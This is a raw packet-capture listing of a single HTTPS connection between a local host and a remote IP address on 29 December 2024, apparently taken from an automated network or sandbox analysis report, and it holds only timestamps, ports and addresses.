Dec 29, 2024 17:56:09.499219894 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.499309063 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.499327898 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.499371052 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.507376909 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.507394075 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.507431030 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.507441044 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.507448912 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.507488966 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.515566111 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.515582085 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.515752077 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.515758991 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.515800953 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.522725105 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.522739887 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.522804022 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.522810936 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.522850990 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.530395985 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.530412912 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.530481100 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.530492067 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.530529976 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.538644075 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.538660049 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.538746119 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.538753986 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.538815022 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.546720982 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.546745062 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.546801090 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.546812057 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.546849966 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.554955959 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.554970026 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.555036068 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.555042982 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.555080891 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.562577009 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.562599897 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.562657118 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.562668085 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.562700987 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.562716007 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.569717884 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.569732904 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.569814920 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.569823980 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.569868088 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.578026056 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.578041077 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.578115940 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.578128099 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.578182936 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.681435108 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.681453943 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.681574106 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.681590080 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.681636095 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.683924913 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.683998108 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.684195042 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.684250116 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.686403036 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.686419010 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.686472893 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.686479092 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.686518908 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.689557076 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.689575911 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.689626932 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.689634085 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.689676046 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.692056894 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.692071915 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.692137003 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.692145109 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.692177057 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.726587057 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.726605892 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.726656914 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.726670027 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.726711988 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.729029894 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.729043961 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.729108095 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.729115963 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.729161978 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.732217073 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.732232094 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.732285976 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.732294083 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.732331991 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.747278929 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.892128944 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.892149925 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.892265081 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.892271996 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.892313004 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.894526958 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.894542933 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.894597054 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.894604921 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.894642115 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.896964073 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.896977901 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.897030115 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.897036076 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.897074938 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.900269985 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.900284052 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.900345087 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.900352001 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.900394917 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.902677059 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.902692080 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.902760029 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.902765989 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.902807951 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.937041044 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.937060118 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.937273026 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.937289000 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.937334061 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.940131903 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.940148115 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.940213919 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.940220118 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.940260887 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.942625999 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.942641973 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.942708015 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.942713976 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:09.942751884 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:09.963524103 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.103202105 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.103221893 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.103413105 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.103425026 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.103466988 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.105038881 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.105052948 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.105101109 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.105107069 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.105142117 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.107485056 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.107511997 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.107544899 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.107549906 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.107585907 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.107594967 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.110718966 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.110733986 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.110790014 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.110795975 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.110835075 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.113218069 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.113233089 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.113281012 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.113286972 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.113323927 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.147471905 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.147488117 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.147550106 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.147557020 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.147591114 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.150680065 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.150696039 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.150741100 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.150748968 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.150785923 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.153192997 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.153207064 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.153247118 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.153253078 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.153297901 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.202347040 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.313308954 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.313328028 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.313365936 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.313380957 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.313411951 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.313425064 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.315663099 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.315677881 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.315746069 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.315752029 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.315792084 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.315839052 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.318183899 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.318197966 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.318240881 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.318247080 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.318276882 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.318296909 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.321315050 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.321330070 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.321366072 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.321373940 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.321402073 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.321422100 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.323797941 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.323812962 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.323858023 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.323867083 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.323911905 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.358499050 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.358514071 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.358567953 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.358582020 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.358633041 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.361037970 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.361058950 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.361089945 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.361095905 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.361123085 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.361145973 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.363362074 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.363406897 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.363405943 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.363423109 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.363468885 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.365829945 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.365844965 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.365875006 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.365880966 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.365911007 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.407267094 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.525983095 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.525996923 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.526123047 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.526129961 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.526225090 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.528500080 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.528513908 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.528568983 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.528574944 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.528616905 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.530926943 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.530953884 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.530985117 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.530991077 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.531019926 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.531039953 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.534172058 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.534185886 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.534225941 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.534233093 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.534261942 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.534281015 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.568270922 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.568288088 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.568356991 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.568366051 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.568412066 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.571506977 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.571521997 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.571583986 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.571588993 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.571625948 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.573995113 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.574009895 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.574069023 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.574074984 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.574112892 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.576549053 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.576562881 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.576621056 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.576627970 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.576666117 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.736557007 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.736574888 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.736737013 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.736737013 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.736748934 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.736790895 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.738993883 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.739007950 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.739058971 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.739064932 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.739101887 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.742192984 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.742208004 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.742265940 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.742273092 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.742311954 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.744704008 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.744719028 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.744779110 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.744786978 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.744828939 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.779517889 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.779565096 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.779704094 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.779704094 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.779719114 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.779763937 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.782046080 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.782059908 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.782120943 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.782125950 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.782166958 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.784632921 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.784647942 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.784706116 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.784710884 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.784754038 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.945169926 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.945184946 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.945235968 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.945242882 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.945275068 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.945293903 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.947145939 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.947160959 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.947218895 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.947225094 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.947261095 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.949630976 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.949645996 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.949700117 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.949706078 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.949744940 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.952832937 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.952847958 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.952894926 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.952900887 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.952929974 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.952949047 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.955308914 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.955328941 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.955389977 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.955399036 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.955439091 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.989927053 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.989947081 CET	443	49758	172.67.208.58	192.168.2.4
Dec 29, 2024 17:56:10.990025997 CET	49758	443	192.168.2.4	172.67.208.58
Dec 29, 2024 17:56:10.990044117 CET	443	49758	172.67.208.58	192.168.2.4
